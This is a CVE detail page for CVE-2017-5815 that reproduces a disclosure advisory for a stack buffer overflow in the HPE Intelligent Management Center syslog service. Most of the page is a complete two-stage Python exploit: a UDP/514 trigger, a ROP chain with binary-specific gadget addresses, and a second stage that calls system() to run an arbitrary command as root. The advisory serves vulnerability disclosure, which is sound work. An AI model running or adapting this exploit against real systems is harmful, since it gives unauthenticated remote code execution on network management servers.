CVE-2017-5815 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

## Vulnerability Summary The following advisory describes a Stack Buffer Overflow vulnerability found in HPE Intelligent Management Center version v7.2 (E0403P10) Enterprise, this vulnerability leads to an exploitable remote code execution. HPE Intelligent Management Center (iMC) delivers comprehensive management across campus core and data center networks. iMC converts meaningless network data to actionable information to keep your network, and your business, moving. ## Credit An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program ## Vendor response HPE has released a patch to address this vulnerability and issued the following CVE-2017-5815. ## Vulnerability Details HPE Intelligent Management Center (iMC) is vulnerable to a stack buffer overflow that lead to remote code execution. The imcsyslogdm service handles syslog messages received on UDP port 514. The imcsyslogdm service handles the forwarded messages by using FORWARD_HEAD ( ‘Forwarded From:‘) and FORWARD_HEAD_END (‘Quidview‘) markers at the beginning of the packet to indicate the originator of the syslog message. In case there’s a FORWARD_HEAD marker but no FORWARD_HEAD_END, the application ends up copying the contents of the packet into a fixed-size stack buffer that is vulnerable to a buffer overflow. ## Proof of Concept The first stage of the proof of concept is used to trigger the overflow and start a ROP chain by sending data on UDP port 514. The application also binds to UDP port 65535 but doesn’t seem to use it. After we triggered the buffer overflow, we will look for the file descriptor of this socket – the file descriptor number of this socket seems to be the number 27 most of the time, and the number 28 occasionally. To avoid non-determinism, the ROP chain retrieves the file descriptor number from the singleton instance holding it. Then it reads 0x25f bytes into the .bss and pivots the stack there. The second stage contains another ROP chain, the command to be executed, and some helper strings. It resolves the address of system in libc via dlopen and dlsym. Executes the command via system. The command length is currently limited to ~470 bytes (the exploit checks for this) but could be extended for more and ends in an infinite loop. While termination is avoided this way, this thread is responsible for handling syslog messages, so that function of the program will be broken. ``` #!/usr/bin/env python2 import socket import struct IP = '192.168.0.20' PORT = 514 # the command to execute command = 'echo "OK GOOGLE!" > /etc/issue ; #\0' # port to use for the second stage payload, this is created during normal operation # of the application, we just reuse it because there's no other thread waiting on it # like in the case of the initial udp/514 vector, which could interfere with sending # the second stage PORT_SECOND_STAGE = 65535 # markers used for forwarded syslog messages SYSLOG_FORWARD_HEAD = 'Forwarded From:' SYSLOG_FORWARD_HEAD_END = 'Quidview' def rop(*args): return struct.pack('I' * len(args), *args) # mock object of the ELF class from pwntools so that the final exploit doesn't depend on it class ELF: def bss(self, offset): return 0x884D0C0 + offset plt = { 'read': 0x805957C, 'dlopen': 0x805857C, 'dlsym': 0x80597BC, } e = ELF() # strings used in the second stage libc_str = 'libc.so.6\0' system_str = 'system\0' # ROP gadgets from, the latest available version: # (Intelligent Management Center Enterprise (7.2_E0403) with E0403P10 applied # [root@vm bin]# md5sum imcsyslogdm # 8b06adbd3d47a372358d9106e659d9b2 imcsyslogdm pop2_ret = 0x0805b137 # pop edi ; pop ebp ; ret pop3_ret = 0x08480408 # pop edi ; pop ebx ; pop ebp ; ret pop4_ret = 0x084f213a # pop edi ; pop esi ; pop ebx ; pop ebp ; ret zero_edx = 0x084f90c1 # xor edx, edx ; ret inc_edx = 0x0811c5e6 # inc edx ; ret pop_ebx = 0x080dd8cd # pop ebx ; ret # used to write values obtained dynamically by the ROP chain to the stack eax_to_stack = 0x08703fba # mov dword ptr [esp + edx*8], eax ; adc dword ptr [ebx], eax ; ret ret = 0x080485c0 # ret add_eax_28 = 0x084ddd16 # add eax, 0x1c ; pop ebp ; ret dec_eax = 0x080dd660 # dec eax ; ret zero_eax = 0x080834d4 # xor eax, eax ; ret add_eax_25f = 0x0845f636 # add eax, 0x25f ; pop ebx ; pop ebp ; ret ret_C = 0x0814b04e # ret 0xc xchg_eax_esp = 0x0807a2c7 # xchg eax, esp ; ret pop_eax = 0x0837db70 # pop eax ; ret get_instance = 0x08091210 # ::instance of a Singleton used to retrieve a socket fd mov_eax_eax_plus_0x5c = 0x08562d44 # mov eax, dword ptr [eax + 0x5c] ; ret # the offset of the second stage into the .bss second_stage_offset_into_bss = 0x6500 second_stage_data = libc_str + system_str + command # place the data above the rop chain so that the stack usage of functions # won't clobber it. Also, the second ROP chain has to be shorter than this. second_stage_data_offset = 120 # the length of the command to be executed is limited to around 470 bytes assert len(command) < 0x25f - second_stage_data_offset - len(system_str) - len(libc_str) # the first stage has to be 0-byte free, so we do as little as possible here to read in a second stage first_stage = rop( # the stack write gadget (`eax_to_stack` above) writes eax to [esp + edx*8] zero_edx, inc_edx, inc_edx, inc_edx, inc_edx, inc_edx, inc_edx, inc_edx, inc_edx, pop_ebx, # points somewhere in the bss, just needs to be writable for the eax_to_stack gadget e.bss(0x5fc0), # the second stage goes to udp/65535, which the application binds but doesn't # seem to use for anything. The only thing not completely deterministic in the exploit # is the fd number of this port, which seems to be quite reliably 27 but sometimes 28. # We get its fd from a class member, and we get the class via a singleton ::instance function. # [root@vm bin]# lsof | grep syslog | grep UDP | grep 65535 # imcsyslog 24741 root 27u IPv4 39655685 0t0 UDP *:65535 get_instance, mov_eax_eax_plus_0x5c, eax_to_stack, # write the handle to the stack # write the read count to the stack zero_edx, inc_edx, inc_edx, inc_edx, inc_edx, zero_eax, add_eax_25f, # picked up by the above into ebx, written to by eax_to_stack, just needs to be writable e.bss(second_stage_offset_into_bss - 0x80), 0x41414141, eax_to_stack, # write the handle to the stack ret_C, e.plt['read'], 0x41414141, 0x41414141, 0x41414141, pop3_ret, 0x41414141, # placeholder for the fd of udp/65535 e.bss(second_stage_offset_into_bss), 0x41414141, # placeholder for the read count pop_eax, e.bss(second_stage_offset_into_bss), xchg_eax_esp ) assert '\0' not in first_stage print('* Sending first stage to udp/514') # print repr(first_stage) s_514 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s_514.sendto(SYSLOG_FORWARD_HEAD + 'A'*48 + first_stage + '\0', (IP, PORT)) s_514.close() # the second stage does a dlopen/dlsym to get the address of the system function, # then executes the given command via it. second_stage = rop( e.plt['dlopen'], # get libc handle pop2_ret, e.bss(second_stage_offset_into_bss + second_stage_data_offset), 2, # RTLD_NOW (why not) # write the returned handle to the stack zero_edx, inc_edx, pop_ebx, e.bss(second_stage_offset_into_bss - 0x80), # somewhere in the bss eax_to_stack, # write the handle to the stack e.plt['dlsym'], pop2_ret, 0x41516171, # placeholder, libc handle is written here e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str)), # address is 'system' string # write the returned address to the stack zero_edx, inc_edx, pop_ebx, e.bss(second_stage_offset_into_bss - 0x80), # somewhere in the bss eax_to_stack, # write the handle to the stack ret, ret, 0x51617181, # placeholder, the address of system gets written here 0x854ae76, # continuation of execution: a simple infinite loop of 0xeb 0xfe e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str) + len(system_str)) ) print('* Sending second stage to udp/65535') # print repr(second_stage) second_stage_final = second_stage.ljust(second_stage_data_offset) + second_stage_data s_65535 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) s_65535.sendto(second_stage_final.ljust(0x25f), (IP, PORT_SECOND_STAGE)) s_65535.close() print('! Done.') ```